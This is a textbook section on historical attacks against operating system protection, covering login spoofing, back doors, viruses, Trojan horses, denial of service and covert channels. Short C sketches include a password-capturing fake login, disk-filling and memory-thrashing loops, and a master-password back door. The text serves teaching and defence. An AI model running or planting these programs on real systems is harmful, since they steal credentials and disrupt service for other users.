3.2 - Typical Attacks on OS Protection

Copyright(c), 1990, 1995 Fred Cohen - All Rights Reserved

If an OS is based on an appropriate policy, is well written, has no errors, is properly applied, maintained, and operated, and properly tolerates hardware failures, OS protection may be very effective. When any of these conditions breaks down, things fall apart quickly. As an example, in MVS, a very popular and old operating system for large mainframe computer systems, maintaining proper OS protection requires that at least 15 independent subsystems be properly maintained. Each subsystem changes with time, because there are literally thousands of users accessing such a system at any given time, hundreds of programmers changing software in the system, monthly upgrades from various software suppliers, and ongoing changes in the authorizations of the system's users. A single bit error in any of these 15 subsystems will cause the entire computer system to become insecure. It should not be surprising to hear that in a recent study performed by a major accounting firm, over 80% of these systems in business use were found to have improper controls in place. In a recent GAO study, over 90% of the military and government computers using this system were found to have the same problem.

With this as background, we will now review some examples of how OSs have been attacked in the past. Many of the following examples are derived from [Linde75], [Lampson73], [Ritche82], and [Reid83].

Many users are relatively unaware of the protection provisions in the systems they use. In a typical undergraduate computer science program, less than 15 minutes are spent on the topic of information protection, and that time is spent discussing the way memory is allocated to processes to prevent accidental conflicts. Computer-knowledgeable students often find assignments, exams, and their solutions left unprotected because of their professors' lack of knowledge. This problem is compounded in universities by the fact that most computer systems are operated by students who are given accounts with access to all of the information on the system and asked to perform administrative functions at night and on weekends when no supervision is available. It is like putting the keys in the ignition and leaving the door unlocked; even an honest student would have a hard time resisting the temptation.

The same problems abound in industry. A newly hired computer operator with only a few hours' worth of training who is willing to work the midnight shift on a weekend is typically left alone in the building with an account allowing full access to all information. It is very easy to get such a job in most companies, and the amount of damage that can be done is truly astounding.

Most systems are set up with inadequate default protection. A typical system is delivered with standard passwords for a large list of maintenance and administration accounts, any of which can be used by a knowledgeable attacker to examine or modify all of the information on the system. In several cases, hundreds of computers were entered this way by a single perpetrator, including systems throughout an international NASA network, DOD computers, industrial systems, systems maintaining patient treatment data in hospitals, and educational computers storing grading information.

In many cases, system administrators, either through lack of knowledge or poor judgment, allow attacks that are easily prevented. Many systems allow the system administrator to set default protections, but this is rarely done because the administrative tools do not support the activity. Most administrators aren't even aware of what is happening on their systems. Over a two-week period in one medium-sized computer center, 5 independent attacks were reported to a research team. The computer center knew about only one of them, and was quite embarrassed to find out that the researchers knew of it.

Even in the most aware organizations, where a substantial effort is made to defend against attacks, it is a rare stroke of luck when an attack is detected. In one widely publicized case, AT&T managed to track down an attacker who had been accessing hundreds of computers over a period of several years. The attack was detected by a systems administrator who was working at night and happened to notice someone else logged in. He checked because he didn't think that person would normally work at such hours, and found that an attack was underway. AT&T has one of the most extensive systems administrator training programs in the industry, requires computer security training for all employees, and is a leader in the development of secure systems.

Tracking down an attacker is usually very hard without a great deal of expertise, and usually requires that the attacker strike repeatedly over a long period of time. It took AT&T several years to detect this attack, and catching the attacker took access to telephone system information that most businesses do not have and hundreds of thousands of dollars. Without a Herculean effort by systems administrators, modern systems cannot be maintained with a reasonable degree of protection.

In many OSs it is possible for users to cause errors that grant access to instructions or data normally accessible only to the OS. Once this access has been granted, any data in the computer can usually be accessed, and portions of the OS may be modified to allow ongoing attacks without detection. Because of the complexity of modern OSs, it is not feasible to assure that such loopholes do not exist. A clever attacker can get past nearly any modern OS in this way.

There are many other less disastrous errors that can allow successful attacks on part of a system's information with or without detection. A large amount of expertise is often required for worst case attacks. This is sometimes seen as a good reason to assure that the personnel with the greatest access (operators and maintenance people) have the least knowledge of how to abuse the system. This perspective is clearly invalidated by a wealth of historical data.

Sometimes hardware errors can result from software instructions. As an example, the early versions of the Radio Shack TRS-80 could be permanently destroyed with a simple 2-instruction program. The IBM PC had an error in an arithmetic instruction which caused wrong answers in floating point calculations. The IBM 360 used to have an instruction which caused the entire machine to power down, often causing permanent failures. These were all left unprotected by the OS at one point.

In at least one case, a computer operator took orders issued by his supervisor through electronic mail. Since the electronic mail system was not secure at this installation, it was possible for any user to append data to the operator's incoming mail file. If the data was formatted correctly, there was no way to tell legitimate mail from a forgery. After several mysterious system crashes and file losses, the supervisor called the operator into his office to find out what was going on. The operator said that he was just following the supervisor's instructions, and that he could prove it! He logged into the system, and showed the surprised supervisor the forged messages.
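
A minimal sketch of why the forgeries were indistinguishable from real mail is shown below, assuming a traditional world-appendable spool file; the path, header format, and message text are all hypothetical.

    #include <stdio.h>

    int main(void)
    {
        /* on the system described, any user could append to this file */
        FILE *mbox = fopen("/usr/spool/mail/operator", "a");   /* hypothetical spool path */

        if (mbox == NULL)
            return 1;
        /* a correctly formatted header makes the forgery indistinguishable from real mail */
        fprintf(mbox, "From supervisor Fri Oct 13 02:00:00 1995\n");
        fprintf(mbox, "Subject: tonight's run\n\n");
        fprintf(mbox, "Please remove last night's accounting files.\n\n");
        fclose(mbox);
        return 0;
    }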

One type of electronic embezzlement that has been successfully carried off many times involves a programmer who handles interest calculations on bank accounts. In calculating the interest using a digital computer, there is nearly always some error in the last bit of precision. The programmer need only determine the error and channel it to a personal account. Since the books always balance, no apparent embezzlement is taking place; the bank merely loses the small difference it would otherwise make on the error in computing interest. This small difference occurs millions of times a day, and tens of millions of dollars have been taken this way. Please note that when the money is not taken by embezzlement, the bank gets it, a practice many see as unfair.
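
The arithmetic is easy to see in a small sketch. The interest rate, balance, number of accounts, and rounding rule below are illustrative assumptions, not figures from any real case; the point is only that sub-cent residues add up quickly.

    #include <stdio.h>
    #include <math.h>

    int main(void)
    {
        double daily_rate = 0.05 / 365.0;       /* assumed 5% annual interest */
        long   accounts   = 1000000;            /* assumed number of accounts */
        double skimmed_cents = 0.0;

        for (long i = 0; i < accounts; i++) {
            double balance_cents  = 123456.0;                 /* $1,234.56 in every account here */
            double interest_cents = balance_cents * daily_rate;
            double credited       = floor(interest_cents);    /* the customer is credited whole cents */
            skimmed_cents += interest_cents - credited;       /* the sub-cent remainder goes elsewhere */
        }
        printf("one day's rounding residue: $%.2f\n", skimmed_cents / 100.0);
        return 0;
    }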

A common technique is to gain control over a large number of terminals, either by logging in on them or by requesting control over them from the OS. Once in control, it is quite easy to have a program act as if it were the system's standard login program and listen for user identifications and passwords. The spoofing program typically acts as if the system isn't accepting users at this time, or reports a wrong password and releases control to the operating system for the next try. In several experiments, this technique succeeded in gaining full access to a system every time; attack times depend only on how often users log in.
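
A minimal sketch of such a spoofing program is shown below, assuming it is left running on an idle terminal in place of the real login program; the prompt text and drop-file name are hypothetical, and a real spoof would also turn off echo for the password.

    #include <stdio.h>

    int main(void)
    {
        char user[64], pass[64];

        printf("login: ");
        fflush(stdout);
        if (fgets(user, sizeof user, stdin) == NULL)
            return 0;
        printf("Password: ");                       /* a real spoof would also disable echo */
        fflush(stdout);
        if (fgets(pass, sizeof pass, stdin) == NULL)
            return 0;

        FILE *log = fopen("/tmp/.captured", "a");   /* hypothetical drop file */
        if (log != NULL) {
            fprintf(log, "%s%s", user, pass);       /* each line already ends in a newline */
            fclose(log);
        }
        printf("Login incorrect\n");                /* victim assumes a typing error and tries again */
        return 0;
    }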

Another common technique is to observe the part of the OS where input and output are stored before processing. By watching these "I/O buffers", all input and output may be observed, just as with a tapped phone line. Most OSs protect against this simple attack, but few protect against hardware devices with direct access to the computer's memory, which can often be programmed by any user to examine or modify any memory location in the machine.

A series of attacks were made on the users of a computer system by a user posing as the system operator and sending other users messages indicating that their password was needed in order to prevent loss of their files or to allow them access to some new system facility. Because of a lack of user education, many naive users fell victim. The installation now issues written warnings about such problems and has signs on every door to help educate users. The attacker could have been caught with relative ease if a sufficiently knowledgeable expert had been targeted, but apparently only the ignorant were chosen for these attacks.

A common OS-related attack involves theft from system backup tapes. Since these tapes are often less protected than the systems they back up, they are an easy target. As an example, changing a tape label can often be done in a second on a casual tour of a facility. The tape can then be read by the attacker at will, or removed from the tape library for in-depth examination at another site.

Many OS designers leave 'back doors', methods by which the designer is able to penetrate the system without legitimate access. They are usually hard to find, even with a copy of the OS source code and the time to look for attacks. This practice is a terrible threat to OS protection, in the same way that a secret way of decrypting messages is a terrible threat to a cryptosystem. The current trend of not releasing source code makes such back doors far more difficult to uncover.
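
A back door can be as small as a single extra comparison. The sketch below is a purely hypothetical illustration of the idea, not code from any real OS; the function name and master string are invented.

    #include <stdio.h>
    #include <string.h>

    /* hypothetical password check with a hidden master value */
    static int password_ok(const char *typed, const char *users_password)
    {
        if (strcmp(typed, users_password) == 0)
            return 1;                            /* the documented check */
        if (strcmp(typed, "wizard-mode") == 0)
            return 1;                            /* the undocumented back door */
        return 0;
    }

    int main(void)
    {
        /* the designer gets in without knowing the user's real password */
        printf("%d\n", password_ok("wizard-mode", "users-real-password"));
        return 0;
    }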

One of the most creative attacks using a peripheral device is the "terminal gone awry". It is a bit complicated, but here we go. Many terminals can be programmed remotely: control sequences sent to the screen can load attacker-chosen characters into the terminal's answerback or function-key buffers and then trigger their transmission, so the terminal sends those characters back to the computer as if the logged-in victim had typed them. Any command the victim is authorized to give can be given this way.

This attack can be launched with electronic mail, with any program run by another user, and in some cases with system-generated error messages, since anything that causes the right characters to be displayed on the victim's terminal will do.

In most computer systems, I/O lines are not immediately disconnected when a telephone call is terminated; it almost always takes a few thousandths of a second, and if configured improperly, the line can remain available indefinitely. Users often hang up the phone without logging out, and a call placed immediately thereafter ends up logged into the same account. In one case, a class demonstration involving three computers was underway: a PC, a computer connected to an external telephone system, and a remote computer across the US. The class was somewhat surprised to find that, in connecting from the PC to the local computer, the line was left logged into another user's account. It was explained that this happens every so often and that it is a terrible problem. The real surprise came when the long-distance call across the US was made: this line too was logged into an account on the remote machine. It took quite a while to convince the group that this was not planned.

Denial-of-service attacks take many different forms. Filling disk space is possible on many systems where allocation limits are not available or not properly used. Spawning many large processes can often reduce performance for other users. Using all of the magnetic tapes often makes other users wait. On the PDP-10, an indirect jump could involve any number of indirections and at one time was treated as a single uninterruptible instruction; by making a loop of pointers, a user could completely halt all other processing until the system was reinitialized.
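
The disk-filling variant, for instance, needs nothing more than a write loop. This sketch assumes a system with no per-user disk quotas; the file name is arbitrary.

    #include <stdio.h>

    int main(void)
    {
        char block[8192] = {0};
        FILE *f = fopen("filler.dat", "w");      /* arbitrary file name */

        if (f == NULL)
            return 1;
        /* keep writing until the write fails, i.e. the file system is full */
        while (fwrite(block, 1, sizeof block, f) == sizeof block)
            ;
        fclose(f);
        return 0;
    }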

A typical attack on a "virtual memory system" demonstrates the difficulty of eliminating denial-of-service attacks. Virtual memory is a way of letting users act as if the internal memory of a computer is very large, even though the physical internal memory is very small. It does this by storing portions of memory on a disk or other storage device until they are required for processing; information is removed from physical memory to make room for other users. Normally, such a system keeps many of the most recently used pages from each user in memory, but an attacker can fool the system into kicking everyone else out of memory by using large numbers of different pages in rapid succession. Each time this process runs, all other processes are forced out onto the disk and back again. Since disk is far slower than internal memory, this slows the system considerably, often by a factor of 100 or more.
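
A sketch of such a paging attack appears below. The allocation size is an assumption that must exceed the machine's free physical memory for the effect described above to occur.

    #include <stdlib.h>

    #define PAGE  4096UL
    #define TOTAL (2048UL * 1024 * 1024)   /* assumed to exceed free physical memory */

    int main(void)
    {
        char *p = malloc(TOTAL);

        if (p == NULL)
            return 1;
        for (;;)                                        /* run until killed */
            for (unsigned long i = 0; i < TOTAL; i += PAGE)
                p[i]++;                                 /* one touch per page keeps every page "recently used" */
    }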

"Time bombs" are used fairly frequently by programmers to prevent the use of a system after some date, or when the programmer becomes dissatisfied with other factors. A time bomb is any time triggered program effect. Many consultants include time bombs in programs to assure that they get paid. If checks bounce, the system self destructs. Any set of conditions in the computer can be easily used to trigger implanted attacks of this sort.

The virus attack [Cohen84-2] [Cohen86-2] is based on introducing a diseased program into an environment, either via a Trojan horse or by other methods. The diseased program "P" uses the privileges of the user "U" who runs it to grant the creator of the virus "C" all access rights of U, and to spread the disease to all of U's executable programs. Once U is infected, any other user who runs any of U's programs becomes infected, and so forth. An initial study showed that with a simple virus of this sort, a computer system was completely taken over (all privileges of all users were granted to C) in half an hour on average over 5 attacks. The initial user in the study had no special privileges, and used the virus only in a very limited way to assure that the infection was limited and easily traced. Even the system administrators who knew that the program was going to be run were compromised easily. The situation with viruses is so bad that many systems throughout the world have been seriously damaged, and new laws have been introduced to make the use of computer viruses illegal.
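
The speed of such a takeover comes from the transitive sharing of programs, which a small simulation can illustrate. The number of users, the rate at which they run one another's programs, and the random sharing pattern below are invented assumptions, not the conditions of the study cited above.

    #include <stdio.h>
    #include <stdlib.h>

    #define USERS 100          /* assumed number of users on the system */
    #define RUNS_PER_HOUR 4    /* assumed shared-program runs per user per hour */

    int main(void)
    {
        int infected[USERS] = {0};
        int count = 1, steps = 0;

        infected[0] = 1;                        /* the attacker's initial infected program */
        srand(1);
        while (count < USERS) {
            /* each step, one user runs a program owned by a random user */
            int runner = rand() % USERS;
            int owner  = rand() % USERS;
            if (infected[owner] && !infected[runner]) {
                infected[runner] = 1;           /* running an infected program infects the runner */
                count++;
            }
            steps++;
        }
        printf("all %d users infected after %d program runs (about %.1f hours)\n",
               USERS, steps, (double)steps / (USERS * RUNS_PER_HOUR));
        return 0;
    }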

The "Trojan horse" attack is perhaps the most common advanced attack in use today. Like the original Trojan horse, this attack involves implanting an unadvertised function in a program. The corrupt program is then given to other users. After they install it, the problems begin. In the simplest case, every user that runs the program is compromised. One such program was put on a system by a normal user and announced over the system bulletin board. Within 60 seconds, a system administrator tried the program and gave full access to every aspect of the computer to the attacker. In a controlled experiment, it was found that this attack gained full access to about 10% of the users of a system 90% of the time, and full access to the entire computer system the remaining 10% of the time.

Trojan horses present substantial problems for nearly every OS, primarily because there is no method to assure that no Trojan horses are present. Under current theory, we can prove that a program does what it is supposed to do (called sufficiency), but we cannot prove that it does nothing more (called necessity).

Many "secure" retrofits of OSs fail due to unspecified system calls or system calls using unexpected parameters. A typical example is was system call in a CDC OS that, when given an illegal value, allowed access to memory that the user was not supposed to be allowed to access. Checking calling values to system routines is an important aspect of OS implementation, but it doesn't guarantee protection.

A common problem comes from the allocation of previously used space without first erasing it. If the space previously contained information that was not to be released to its new owner, the data can be leaked. In the case of magnetic tapes, preventing this can be quite time-consuming, and even erasure doesn't guarantee that the data will be unreadable: demonstrations have been given in which data from erased disks and tapes was read repeatedly until the information once stored on them reappeared in the form of non-uniform probabilities of values.
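
The same reuse problem can be seen in miniature inside a single program's memory allocator. Whether this particular sketch actually shows the old data depends on the allocator and platform; it illustrates the principle rather than giving a reliable demonstration.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(void)
    {
        char *first = malloc(64);
        if (first == NULL)
            return 1;
        strcpy(first, "secret: account password");   /* sensitive data written to the block */
        free(first);                                 /* freed, but never erased */

        char *second = malloc(64);                   /* may be handed the very same block */
        if (second == NULL)
            return 1;
        printf("new allocation contains: %.32s\n", second);
        free(second);
        return 0;
    }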

Covert channels are possible in every timesharing OS, and it has been shown to be impossible to completely eliminate this problem whenever resources are shared in a non-fixed fashion. A typical example is the use of disk space to indicate a condition, but any storage or timing information on shared media can be used for this purpose. The classic example is filling the disk to indicate a 1 and removing this condition to indicate a 0. Shannon's information theory [Shannon48] shows that such a channel can be used to send an arbitrary quantity of information with arbitrary reliability, given sufficient time.
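
The receiving end of the classic disk-filling channel might look like the sketch below, which assumes a POSIX-style system, an agreed-upon bit period, and a fullness threshold; all three are illustrative choices rather than part of any standard scheme.

    #include <stdio.h>
    #include <unistd.h>
    #include <sys/statvfs.h>

    int main(void)
    {
        struct statvfs vfs;

        for (int bit = 0; bit < 8; bit++) {          /* receive one assumed byte */
            sleep(10);                               /* agreed-upon bit period */
            if (statvfs("/tmp", &vfs) != 0)
                return 1;
            /* a nearly full file system signals a 1, anything else a 0 */
            double free_fraction = (double)vfs.f_bavail / (double)vfs.f_blocks;
            putchar(free_fraction < 0.05 ? '1' : '0');
            fflush(stdout);
        }
        putchar('\n');
        return 0;
    }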

Most OSs don't take adequate measures to assure protection of resources that are dismountable. A typical attack is to request the use of a tape with write access when only read access should be allowed. Most OSs don't have sufficient protection to prevent this attack if the operator fails to catch the mistake, and very few systems prevent malicious operators from taking actions that cause harm. During maintenance this is a particularly important problem, since the hardware itself becomes open to inspection and modification.

Almost no OS is able to handle attacks that depend on the timing of interrupts. An interrupt is usually caused when a physical peripheral device electronically notifies the computer that it has fulfilled a request, or is ready to fulfill one. In many cases, interrupts must be handled within a few milliseconds or the device will not work properly. Because interrupts can occur at any time, there may be a very large number of interrupt sequences and extremely complex interdependencies between interrupt states. In most systems there is some sequence of interrupts that causes a system security failure, and because of the large number of possible sequences, it is impossible to fully test interrupt routines. Many systems allow these routines to be exercised systematically, and when one eventually makes a sufficiently damaging error, it is often possible to take advantage of the error to attain rights that should not be granted to the attacker.

At one small computer conference, 5 "secure" OS products for a microcomputer-based system were being demonstrated by competing companies, all of them claiming to be impenetrable. In under 4 hours, all of them had fallen to attack by a user who had no experience with their operation and no special information about how they worked prior to the demonstration, using only techniques authorized to the least trusted class of users they supported.

In many cases, correcting known errors introduces new errors. A typical example is the recurring problem of receiving a higher-priority interrupt while processing a lower-priority interrupt. The standard technique for resolving this problem is to use a memory area to store lower-priority interrupt information while higher-priority interrupts are processed. In periods of high utilization, the number of interrupts may be so high that the system runs out of space to store the lower-priority interrupts, causing a system failure. The solution is to make more space available for storing these interrupts, but as more and more space is devoted to the system, less and less is left for the users. In one such case, some user programs could no longer run because there wasn't enough space left. Plugging the hole only opened up a new leak.

These represent only a small sampling of the attacks that have proven successful against systems that were thought by their designers to be very secure. In most cases, the OSs had evolved over many years, with every known protection flaw repaired to the best of the designers' abilities, and yet efforts to plug leaks often resulted in the creation of new leaks. These systems range from those built by the largest computer company in the world to those designed by small development firms. The point should be clear: protection cannot be attained by ad-hoc methods or by trying to plug a leaky sieve.